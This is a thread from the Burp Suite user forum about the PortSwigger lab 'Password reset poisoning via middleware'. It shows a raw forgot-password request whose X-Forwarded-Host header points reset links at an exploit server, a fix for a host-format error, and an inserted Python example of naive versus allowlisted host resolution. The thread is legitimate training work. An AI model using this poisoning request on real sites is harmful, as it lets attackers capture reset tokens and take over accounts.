The Burp Suite User Forum was discontinued on the 1st November 2024.


Host header not present - Password reset poisoning via middleware

Dennis | Last updated: Mar 25, 2022 01:53AM UTC

Hi, I'm trying to complete the lab "Password reset poisoning via middleware". I sent POST /forgot-password to Repeater and added "X-Forwarded-Host: https://exploit-ac541f6c1f4c0014c001b73d016c00f1.web-security-academy.net" to the request. It looks like this in Repeater:

    POST /forgot-password HTTP/1.1
    Host: aca81fc11fb90044c029b70c00d3002f.web-security-academy.net
    Cookie: session=r7onTvLunxE8EyQxuIqVXubS51iFgcr7
    Content-Length: 15
    Cache-Control: max-age=0
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Linux"
    Upgrade-Insecure-Requests: 1
    Origin: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net/forgot-password
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    X-Forwarded-Host: https://exploit-ac541f6c1f4c0014c001b73d016c00f1.web-security-academy.net
    Connection: close

    username=carlos

When I click Send, I get:

    HTTP/1.1 400 Bad Request
    Content-Type: application/json; charset=utf-8
    Connection: close
    Content-Length: 25

    "Host header not present"

According to the video in the community solutions I should get a 200 OK response. I can't figure out what is going wrong here. I also tried removing "exploit-" at the beginning of the link, which results in the same error. Could you tell me what I'm doing wrong? Thank you.

Hannah, PortSwigger Agent | Last updated: Mar 25, 2022 11:20AM UTC

It looks like you're using a full URL as your X-Forwarded-Host value. Try comparing the value you're using to the existing Host header, and spot the difference between the two.
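The point Hannah makes, that X-Forwarded-Host carries a bare host (optionally host:port) and not a URL with a scheme, and the wider lesson of the lab, that middleware must not build reset links from an unvalidated forwarded host, can both be shown in a small model. This is an added example, not PortSwigger's code or the lab's own middleware; the hostnames and the two resolver functions are constructed for illustration.

```python
"""Model of how a reverse-proxy-aware middleware derives the host used in
password-reset links. Added example; hostnames below are constructed."""
import re
from typing import Mapping, Optional

# RFC 1123 hostname with optional port: no scheme, path, query or userinfo.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?::\d{1,5})?$",
    re.IGNORECASE,
)


def is_bare_host(value: str) -> bool:
    """True for 'host' or 'host:port'; False for 'https://host', paths, etc."""
    return bool(_HOST_RE.match(value.strip()))


def resolve_host_naive(headers: Mapping[str, str]) -> Optional[str]:
    """Behaviour the lab demonstrates: a present X-Forwarded-Host silently
    replaces Host, so whoever controls that header controls the reset link.
    Returns None when the chosen value is not a syntactically valid host,
    which models the '400 Host header not present' seen with a full URL."""
    chosen = headers.get("X-Forwarded-Host") or headers.get("Host")
    return chosen if chosen and is_bare_host(chosen) else None


def resolve_host_hardened(headers: Mapping[str, str],
                          allowed_hosts: set[str]) -> Optional[str]:
    """Defensive variant: a forwarded host is only honoured when it is
    syntactically a host AND on the application's allowlist; otherwise fall
    back to Host, which must itself be allowlisted. None means the caller
    should refuse to build an absolute link at all."""
    for name in ("X-Forwarded-Host", "Host"):
        value = headers.get(name, "").strip().lower()
        if is_bare_host(value) and value in allowed_hosts:
            return value
    return None
```

With the naive resolver, a forwarded bare hostname ends up in the link while a forwarded URL is rejected outright, which matches the two outcomes in this thread; the hardened resolver never uses a host the application does not own.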

Dennis | Last updated: Mar 28, 2022 10:06PM UTC

Thank you Hannah! I thought I tried without https:// as well, but apparently not, because it works now. :-)

Hannah, PortSwigger Agent | Last updated: Mar 29, 2022 07:56AM UTC